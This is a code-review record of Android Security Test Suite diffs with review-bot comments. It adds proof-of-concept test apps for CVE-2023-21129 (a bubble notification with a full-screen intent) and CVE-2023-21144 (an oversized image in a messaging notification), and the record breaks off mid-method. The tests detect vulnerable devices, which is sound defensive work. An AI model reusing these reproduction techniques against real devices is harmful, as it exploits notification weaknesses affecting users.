@@ -34,6 +38,7 @@
import org.junit.runner.RunWith;
import java.util.ArrayList;
+import java.util.List;
@RunWith(AndroidJUnit4.class)
public class DeviceTest {
@@ -56,14 +61,26 @@
add(helperAppPackage);
}
});
-
- AmUtils.setStandbyBucket(helperAppPackage, UsageStatsManager.STANDBY_BUCKET_ACTIVE);
+ List<String> packages = dpm.getUserControlDisabledPackages(componentName);
+ assumeTrue(
+ context.getString(R.string.protectedPackageFailMessage),
+ packages.contains(helperAppPackage));
+ AmUtils.setStandbyBucket(helperAppPackage, STANDBY_BUCKET_ACTIVE);
+ final int firstStandbyBucketValue = AmUtils.getStandbyBucket(helperAppPackage);
+ AmUtils.setStandbyBucket(helperAppPackage, STANDBY_BUCKET_NEVER);
+ final int secondStandbyBucketValue = AmUtils.getStandbyBucket(helperAppPackage);
+ boolean passCondition =
+ (firstStandbyBucketValue == STANDBY_BUCKET_EXEMPTED
+ && secondStandbyBucketValue == STANDBY_BUCKET_EXEMPTED);
+ boolean failCondition =
+ (firstStandbyBucketValue == STANDBY_BUCKET_ACTIVE
+ && secondStandbyBucketValue == STANDBY_BUCKET_NEVER);
+ assumeTrue(
+ context.getString(R.string.bucketValueChangeFailMessage),
+ passCondition || failCondition);
// Test fails if the AdminProtected package bucket is not equal STANDBY_BUCKET_EXEMPTED
- assertFalse(
- context.getString(R.string.testFailMessage),
- AmUtils.getStandbyBucket(helperAppPackage)
- != UsageStatsManager.STANDBY_BUCKET_EXEMPTED);
+ assertFalse(context.getString(R.string.testFailMessage), failCondition);
} catch (Exception e) {
assumeNoException(e);
} finally {
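Review bot: The comment kept above the final `assertFalse` ("Test fails if the AdminProtected package bucket is not equal STANDBY_BUCKET_EXEMPTED") no longer matches the code. The test now fails only when both reads return exactly what was written (`STANDBY_BUCKET_ACTIVE`, then `STANDBY_BUCKET_NEVER`), and every mixed result becomes a skipped test through the `assumeTrue` on `passCondition || failCondition`. A device where the protected package leaves `STANDBY_BUCKET_EXEMPTED` on only one of the two writes, or lands in a bucket other than the requested one, is therefore reported as "Unable to set standby bucket value!!" rather than as vulnerable; whether that can occur depends on `AmUtils`, which is outside this hunk. I would either assert on `passCondition` directly or reword the comment to `// Test fails only if both writes took effect (ACTIVE, then NEVER); any other non-exempt result is skipped above`. The enclosing test method starts and ends outside the hunk.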
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21129/Android.bp b/hostsidetests/securitybulletin/test-apps/CVE-2023-21129/Android.bp
new file mode 100644
index 0000000..4eee8f7
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21129/Android.bp
@@ -0,0 +1,36 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+android_test_helper_app {
+ name: "CVE-2023-21129",
+ defaults: ["cts_support_defaults"],
+ srcs: [
+ "src/**/*.java",
+ ],
+ test_suites: [
+ "sts",
+ ],
+ static_libs: [
+ "androidx.test.core",
+ "androidx.test.rules",
+ ],
+ sdk_version: "current",
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21129/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/CVE-2023-21129/AndroidManifest.xml
new file mode 100644
index 0000000..56bea86
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21129/AndroidManifest.xml
@@ -0,0 +1,37 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2023 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+ package="android.security.cts.CVE_2023_21129">
+ <uses-permission android:name="android.permission.POST_NOTIFICATIONS" />
+ <uses-permission android:name="android.permission.USE_FULL_SCREEN_INTENT" />
+ <application>
+ <activity
+ android:name=".BubbleActivity"
+ android:exported="true">
+ <intent-filter>
+ <action android:name="android.intent.action.MAIN" />
+ <category android:name="android.intent.category.LAUNCHER" />
+ </intent-filter>
+ </activity>
+ <activity android:name=".PocActivity" />
+ <service android:name=".PocService" />
+ </application>
+ <instrumentation
+ android:name="androidx.test.runner.AndroidJUnitRunner"
+ android:targetPackage="android.security.cts.CVE_2023_21129" />
+</manifest>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21129/res/values/integers.xml b/hostsidetests/securitybulletin/test-apps/CVE-2023-21129/res/values/integers.xml
new file mode 100644
index 0000000..50aa41f
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21129/res/values/integers.xml
@@ -0,0 +1,23 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2023 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+<resources>
+ <integer name="bubbleMetaDataheight">600</integer>
+ <integer name="iconHeight">30</integer>
+ <integer name="iconWidth">30</integer>
+ <integer name="idPocNotification">0</integer>
+ <integer name="requestCode">0</integer>
+</resources>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21129/res/values/strings.xml b/hostsidetests/securitybulletin/test-apps/CVE-2023-21129/res/values/strings.xml
new file mode 100644
index 0000000..a4e6c2b
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21129/res/values/strings.xml
@@ -0,0 +1,28 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2023 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+
+<resources>
+ <string name="bubbleNotificDisabled">Bubble Notifications are disabled on this device</string>
+ <string name="conversationTitle">Conversation Title</string>
+ <string name="idNotificationChannel">notificationChannelId</string>
+ <string name="msgFailure">Device is vulnerable to b/274759612 !!</string>
+ <string name="nameBroadcastActionString">CVE_2023_21129_action</string>
+ <string name="nameNotificationChannel">b/274759612 notification</string>
+ <string name="personMessagingStyle">Me</string>
+ <string name="shortcutId">shortcutId</string>
+ <string name="tagNotify">NOTIFY_TAG</string>
+</resources>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21129/src/android/security/cts/CVE_2023_21129/BubbleActivity.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-21129/src/android/security/cts/CVE_2023_21129/BubbleActivity.java
new file mode 100644
index 0000000..27cd450
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21129/src/android/security/cts/CVE_2023_21129/BubbleActivity.java
@@ -0,0 +1,46 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2023_21129;
+
+import android.app.Activity;
+import android.content.Intent;
+
+public class BubbleActivity extends Activity {
+
+ @Override
+ protected void onResume() {
+ try {
+ super.onResume();
+ // Starting PocService as a ForegroundService to post bubbleNotification
+ startForegroundService(new Intent(this, PocService.class));
+ } catch (Exception e) {
+ // ignore any exceptions
+ }
+ }
+
+ @Override
+ protected void onStop() {
+ try {
+ super.onStop();
+ // onStop() has been called successfully, this indicates presence of vulnerability
+ // so broadcasting it to DeviceTest
+ sendBroadcast(new Intent(getString(R.string.nameBroadcastActionString)));
+ } catch (Exception e) {
+ // ignore any exceptions
+ }
+ }
+}
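Review bot: Both `catch (Exception e)` blocks swallow everything, including a failed `startForegroundService` in `onResume()`; in that case no notification is posted, no broadcast is sent, and `DeviceTest` passes because it treats silence within the timeout as "not vulnerable". A log line or a rethrow would make that setup failure visible. `onStop()` also reports the result with an implicit broadcast, `sendBroadcast(new Intent(getString(R.string.nameBroadcastActionString)))`; adding `.setPackage(getPackageName())` keeps the verdict inside the test package. The class would benefit from a short Javadoc saying why a stop of this activity is taken as proof of the issue, since as written any stop during the wait (presumably including ones unrelated to the full-screen intent) counts as a failure.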
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21129/src/android/security/cts/CVE_2023_21129/DeviceTest.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-21129/src/android/security/cts/CVE_2023_21129/DeviceTest.java
new file mode 100644
index 0000000..d9dc035
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21129/src/android/security/cts/CVE_2023_21129/DeviceTest.java
@@ -0,0 +1,97 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2023_21129;
+
+import static android.app.NotificationManager.BUBBLE_PREFERENCE_ALL;
+
+import static androidx.test.platform.app.InstrumentationRegistry.getInstrumentation;
+
+import static org.junit.Assert.assertFalse;
+import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeTrue;
+
+import android.app.NotificationManager;
+import android.content.BroadcastReceiver;
+import android.content.Context;
+import android.content.Intent;
+import android.content.IntentFilter;
+
+import androidx.test.runner.AndroidJUnit4;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.util.concurrent.Semaphore;
+import java.util.concurrent.TimeUnit;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(AndroidJUnit4.class)
+public class DeviceTest {
+
+ @Test
+ public void testBubbleNotification() {
+ try {
+ Context context = getInstrumentation().getContext();
+ Semaphore broadcastReceived = new Semaphore(0);
+ final int timeoutMs = 9000;
+
+ // Register a broadcast receiver to receive broadcast from BubbleActivity indicating
+ // presence of vulnerability
+ BroadcastReceiver broadcastReceiver =
+ new BroadcastReceiver() {
+ @Override
+ public void onReceive(Context context, Intent intent) {
+ try {
+ if (intent.getAction()
+ .equals(
+ context.getString(
+ R.string.nameBroadcastActionString))) {
+ broadcastReceived.release();
+ }
+ } catch (Exception ignored) {
+ // ignore any exceptions
+ }
+ }
+ };
+ IntentFilter filter =
+ new IntentFilter(context.getString(R.string.nameBroadcastActionString));
+ context.registerReceiver(broadcastReceiver, filter);
+
+ // Create a notification manager
+ NotificationManager notificationManager =
+ context.getSystemService(NotificationManager.class);
+
+ // Check if bubble notifications are enabled or disabled on the device
+ assumeTrue(
+ context.getString(R.string.bubbleNotificDisabled),
+ notificationManager.getBubblePreference() == BUBBLE_PREFERENCE_ALL);
+
+ // Launching BubbleActivity
+ Intent intent = new Intent(context, BubbleActivity.class);
+ intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK | Intent.FLAG_ACTIVITY_CLEAR_TASK);
+ context.startActivity(intent);
+
+ assertFalse(
+ context.getString(R.string.msgFailure),
+ broadcastReceived.tryAcquire(timeoutMs, TimeUnit.MILLISECONDS));
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ }
+}
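Review bot: `context.registerReceiver(broadcastReceiver, filter)` registers the receiver without an export flag and never unregisters it. Where the API level allows it I would pass `Context.RECEIVER_NOT_EXPORTED`, since the only intended sender is `BubbleActivity` in the same package; that stops unrelated senders from triggering a false failure. On targets that require an explicit flag it also avoids a `SecurityException` that the outer `catch (Exception e) { assumeNoException(e); }` would turn into a silently skipped test (the module's target SDK is not visible here). An `unregisterReceiver(broadcastReceiver)` in a `finally` block would complete it. The imports of `org.junit.Test` and `org.junit.runner.RunWith` appear twice and one pair can go.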
diff --git a/tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-21129/src/android/security/cts/CVE_2023_21129/PocActivity.java
similarity index 79%
copy from tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java
copy to hostsidetests/securitybulletin/test-apps/CVE-2023-21129/src/android/security/cts/CVE_2023_21129/PocActivity.java
index 4416990..2a92437 100644
--- a/tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21129/src/android/security/cts/CVE_2023_21129/PocActivity.java
@@ -1,5 +1,5 @@
/*
- * Copyright (C) 2022 The Android Open Source Project
+ * Copyright (C) 2023 The Android Open Source Project
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
@@ -14,9 +14,10 @@
* limitations under the License.
*/
-package android.security.cts.CVE_2022_20143;
+package android.security.cts.CVE_2023_21129;
import android.app.Activity;
public class PocActivity extends Activity {
+ // Create an empty activity to detect the vulnerability
}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21129/src/android/security/cts/CVE_2023_21129/PocService.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-21129/src/android/security/cts/CVE_2023_21129/PocService.java
new file mode 100644
index 0000000..1406e83
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21129/src/android/security/cts/CVE_2023_21129/PocService.java
@@ -0,0 +1,141 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2023_21129;
+
+import static org.junit.Assume.assumeNoException;
+
+import android.app.Notification;
+import android.app.NotificationChannel;
+import android.app.NotificationManager;
+import android.app.PendingIntent;
+import android.app.Service;
+import android.content.Intent;
+import android.content.pm.ShortcutInfo;
+import android.content.pm.ShortcutManager;
+import android.content.res.Resources;
+import android.graphics.Bitmap;
+import android.graphics.Canvas;
+import android.graphics.Color;
+import android.graphics.drawable.Icon;
+import android.os.IBinder;
+
+public class PocService extends Service {
+ private Resources mResources;
+
+ @Override
+ public int onStartCommand(Intent intent, int flags, int startId) {
+ try {
+ mResources = getResources();
+
+ // Create a bubble intent
+ PendingIntent bubbleIntent =
+ PendingIntent.getActivity(
+ this,
+ mResources.getInteger(R.integer.requestCode),
+ new Intent(this, BubbleActivity.class),
+ PendingIntent.FLAG_MUTABLE /* flags */);
+
+ // Create a pending intent for fullscreen intent
+ PendingIntent pendingIntent =
+ PendingIntent.getActivity(
+ this,
+ mResources.getInteger(R.integer.requestCode),
+ new Intent(this, PocActivity.class),
+ PendingIntent.FLAG_IMMUTABLE /* flags */);
+
+ // Create icon
+ Icon icon = createNotificationIcon();
+
+ // Create a sharing shortcut
+ String shortcutId = getString(R.string.shortcutId);
+ ShortcutInfo shortcut =
+ new ShortcutInfo.Builder(this, shortcutId)
+ .setIcon(icon)
+ .setIntent(new Intent(Intent.ACTION_MAIN))
+ .setLongLived(true)
+ .setShortLabel(shortcutId)
+ .build();
+
+ // Create a shortcutManager
+ ShortcutManager shortcutManager = getSystemService(ShortcutManager.class);
+
+ // Push the shortcut created above to shortcutManager
+ shortcutManager.pushDynamicShortcut(shortcut);
+
+ // Create a notification channel
+ NotificationChannel notificationChannel =
+ new NotificationChannel(
+ getString(R.string.idNotificationChannel),
+ getString(R.string.nameNotificationChannel),
+ NotificationManager.IMPORTANCE_HIGH);
+ notificationChannel.setDescription(getString(R.string.nameNotificationChannel));
+
+ // Create a notificationManager
+ NotificationManager notificationManager = getSystemService(NotificationManager.class);
+ notificationManager.createNotificationChannel(notificationChannel);
+
+ // Create a bubble metadata.
+ Notification.BubbleMetadata bubbleData =
+ new Notification.BubbleMetadata.Builder()
+ .setDesiredHeight(mResources.getInteger(R.integer.bubbleMetaDataheight))
+ .setIntent(bubbleIntent)
+ .setAutoExpandBubble(true)
+ .setSuppressNotification(true)
+ .setIcon(icon)
+ .build();
+
+ // Set messagingStyle so that conversations is set for notification
+ Notification.MessagingStyle messagingStyle =
+ new Notification.MessagingStyle(getString(R.string.personMessagingStyle))
+ .setConversationTitle(getString(R.string.conversationTitle));
+
+ // Create a notification, referencing the sharing shortcut.
+ Notification.Builder pocNotification =
+ new Notification.Builder(this, getString(R.string.idNotificationChannel))
+ .setContentIntent(bubbleIntent)
+ .setSmallIcon(icon)
+ .setShortcutId(shortcutId)
+ .setBubbleMetadata(bubbleData)
+ .setFullScreenIntent(pendingIntent, true /* high priority */)
+ .setStyle(messagingStyle);
+
+ notificationManager.notify(
+ getString(R.string.tagNotify),
+ mResources.getInteger(R.integer.idPocNotification),
+ pocNotification.build());
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ return super.onStartCommand(intent, flags, startId);
+ }
+
+ Icon createNotificationIcon() throws Exception {
+ Bitmap testBitmap =
+ Bitmap.createBitmap(
+ getResources().getInteger(R.integer.iconWidth),
+ getResources().getInteger(R.integer.iconHeight),
+ Bitmap.Config.ARGB_8888);
+ final Canvas canvas = new Canvas(testBitmap);
+ canvas.drawColor(Color.BLUE);
+ return Icon.createWithBitmap(testBitmap);
+ }
+
+ @Override
+ public IBinder onBind(Intent intent) {
+ return null;
+ }
+}
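Review bot: `assumeNoException(e)` in `onStartCommand` runs inside a service callback rather than inside the JUnit test method, so the `AssumptionViolatedException` it throws is presumably not seen by the runner as a skipped test and would surface on the app's main thread instead. Because `DeviceTest` treats "no broadcast within the timeout" as a pass, a setup failure here should be reported back explicitly (for example through a second broadcast action that the test turns into an assumption failure) or at least logged, not thrown. The service is started through `startForegroundService` in `BubbleActivity`, yet the visible `onStartCommand` never calls `startForeground`; if that is intentional for the reproduction, a comment saying so would help, otherwise the call is missing. `createNotificationIcon()` declares `throws Exception` with no visible checked exception in its body, and it could be `private`.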
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21144/Android.bp b/hostsidetests/securitybulletin/test-apps/CVE-2023-21144/Android.bp
new file mode 100644
index 0000000..a1132bb
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21144/Android.bp
@@ -0,0 +1,39 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+android_test_helper_app {
+ name: "CVE-2023-21144",
+ defaults: [
+ "cts_defaults",
+ ],
+ srcs: [
+ "src/**/*.java",
+ ],
+ test_suites: [
+ "sts",
+ ],
+ static_libs: [
+ "androidx.test.core",
+ "androidx.test.rules",
+ "androidx.test.uiautomator_uiautomator",
+ ],
+ platform_apis: true,
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21144/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/CVE-2023-21144/AndroidManifest.xml
new file mode 100644
index 0000000..c0b27b7
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21144/AndroidManifest.xml
@@ -0,0 +1,38 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2023 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+ package="android.security.cts.CVE_2023_21144">
+
+ <uses-permission android:name="android.permission.EXPAND_STATUS_BAR" />
+ <uses-permission android:name="android.permission.POST_NOTIFICATIONS" />
+ <uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE" />
+ <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />
+
+ <application>
+ <service android:name=".PocListenerService"
+ android:exported="true"
+ android:permission="android.permission.BIND_NOTIFICATION_LISTENER_SERVICE">
+ <intent-filter>
+ <action android:name="android.service.notification.NotificationListenerService" />
+ </intent-filter>
+ </service>
+ </application>
+
+ <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
+ android:targetPackage="android.security.cts.CVE_2023_21144" />
+</manifest>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21144/res/values/strings.xml b/hostsidetests/securitybulletin/test-apps/CVE-2023-21144/res/values/strings.xml
new file mode 100644
index 0000000..d51c9b9
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21144/res/values/strings.xml
@@ -0,0 +1,32 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2023 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+
+<resources>
+ <string name="broadcastAction">CVE_2023_21144_action</string>
+ <string name="dataMimeType">image/png</string>
+ <string name="failMessage">Device is vulnerable to b/252766417 !!</string>
+ <string name="fileNotCreated">image file is not created</string>
+ <string name="imageFile">cve_2023_21144.png</string>
+ <string name="message">CVE_2023_21144_message</string>
+ <string name="notificationChannelId">CVE_2023_21144_notification_channel_id</string>
+ <string name="notificationChannelName">CVE_2023_21144_notification_channel_name</string>
+ <string name="notificationListenerNotConnected">notification listener not connected!!</string>
+ <string name="notificationText">CVE_2023_21144_notification_text</string>
+ <string name="resourceId">android:id/message_text</string>
+ <string name="systemUiPkgName">com.android.systemui</string>
+ <string name="username">CVE_2023_21144_username</string>
+</resources>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21144/src/android/security/cts/CVE_2023_21144/DeviceTest.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-21144/src/android/security/cts/CVE_2023_21144/DeviceTest.java
new file mode 100644
index 0000000..e91c3ea
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21144/src/android/security/cts/CVE_2023_21144/DeviceTest.java
@@ -0,0 +1,197 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2023_21144;
+
+import static androidx.test.platform.app.InstrumentationRegistry.getInstrumentation;
+
+import static org.junit.Assert.assertNull;
+import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeTrue;
+
+import android.app.Instrumentation;
+import android.app.Notification;
+import android.app.Notification.MessagingStyle;
+import android.app.Notification.MessagingStyle.Message;
+import android.app.NotificationChannel;
+import android.app.NotificationManager;
+import android.app.Person;
+import android.app.StatusBarManager;
+import android.content.BroadcastReceiver;
+import android.content.Context;
+import android.content.Intent;
+import android.content.IntentFilter;
+import android.graphics.Bitmap;
+import android.graphics.drawable.Icon;
+import android.net.Uri;
+import android.os.Environment;
+import android.os.Handler;
+import android.os.HandlerThread;
+import android.widget.ImageView;
+
+import androidx.test.runner.AndroidJUnit4;
+import androidx.test.uiautomator.By;
+import androidx.test.uiautomator.UiDevice;
+import androidx.test.uiautomator.UiObject2;
+import androidx.test.uiautomator.Until;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.io.File;
+import java.io.FileOutputStream;
+import java.util.concurrent.CompletableFuture;
+import java.util.concurrent.Semaphore;
+import java.util.concurrent.TimeUnit;
+
+@RunWith(AndroidJUnit4.class)
+public class DeviceTest {
+
+ @Test
+ public void testPocCVE_2023_21144() {
+ try {
+ Instrumentation instrumentation = getInstrumentation();
+ Context context = instrumentation.getContext();
+
+ try (AutoCloseable withTemporaryImage = withTemporaryImage(context)) {
+ // Prepare notification channel
+ NotificationChannel notificationChannel =
+ new NotificationChannel(
+ context.getString(R.string.notificationChannelId),
+ context.getString(R.string.notificationChannelName),
+ NotificationManager.IMPORTANCE_HIGH);
+ NotificationManager notificationManager =
+ context.getSystemService(NotificationManager.class);
+ notificationManager.createNotificationChannel(notificationChannel);
+
+ // Prepare messaging style
+ Person person =
+ new Person.Builder().setName(context.getString(R.string.username)).build();
+ Message message =
+ new Message(context.getString(R.string.message), 0L /* timestamp */, person)
+ .setData(
+ context.getString(R.string.dataMimeType),
+ Uri.fromFile(getImageFile(context)));
+ MessagingStyle messagingStyle = new MessagingStyle(person).addMessage(message);
+
+ // Build notification
+ Notification notification =
+ new Notification.Builder(context, notificationChannel.getId())
+ .setContentText(context.getString(R.string.notificationText))
+ .setSmallIcon(
+ Icon.createWithData(
+ new byte[0] /* data */,
+ 0 /* offset */,
+ 0 /* length */))
+ .setStyle(messagingStyle)
+ .build();
+
+ // Register BroadcastReceiver
+ Semaphore broadcastReceived = new Semaphore(0);
+ BroadcastReceiver broadcastReceiver =
+ new BroadcastReceiver() {
+ @Override
+ public void onReceive(Context context, Intent intent) {
+ try {
+ broadcastReceived.release();
+ } catch (Exception ignore) {
+ // Ignore
+ }
+ }
+ };
+ IntentFilter broadcastFilter =
+ new IntentFilter(context.getString(R.string.broadcastAction));
+ context.registerReceiver(broadcastReceiver, broadcastFilter);
+
+ // Send notification and wait for broadcast to get received
+ notificationManager.notify(0 /* notification id */, notification);
+ final long timeout = 10_000L;
+ assumeTrue(
+ context.getString(R.string.notificationListenerNotConnected),
+ broadcastReceived.tryAcquire(timeout, TimeUnit.MILLISECONDS));
+
+ // With fix, the notification does not contain image. Hence, using uiautomator
+ // to detect the imageview to fail test
+ context.getSystemService(StatusBarManager.class).expandNotificationsPanel();
+ final UiDevice uiDevice = UiDevice.getInstance(instrumentation);
+ UiObject2 uiObject =
+ uiDevice.wait(
+ Until.findObject(
+ By.pkg(context.getString(R.string.systemUiPkgName))
+ .res(context.getString(R.string.resourceId))
+ .desc(context.getString(R.string.message))
+ .clazz(ImageView.class.getName())),
+ timeout);
+ assertNull(context.getString(R.string.failMessage), uiObject);
+ }
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ }
+
+ private AutoCloseable withTemporaryImage(Context context) throws Exception {
+ // Create a png file in a worker Thread.
+ CompletableFuture<Boolean> imageIsReady = new CompletableFuture<Boolean>();
+ final HandlerThread handlerThread = new HandlerThread(context.getPackageName());
+ handlerThread.start();
+ new Handler(handlerThread.getLooper())
+ .post(
+ () -> {
+ try {
+ // The dimension of 13000 x 17000 creates png image of size ~2mb
+ // which is sufficient to extend loading time of 100ms.
+ final int sufficientlyLargeWidth = 13000;
+ final int sufficientlyLargeHeight = 17000;
+ Bitmap bitmap =
+ Bitmap.createBitmap(
+ sufficientlyLargeWidth,
+ sufficientlyLargeHeight,
+ Bitmap.Config.ARGB_8888);
+ File imageFile = getImageFile(context);
+ imageFile.createNewFile();
+ FileOutputStream fileOutputStream = new FileOutputStream(imageFile);
+ bitmap.compress(
+ Bitmap.CompressFormat.PNG,
+ 100 /* quality */,
+ fileOutputStream);
+ fileOutputStream.flush();
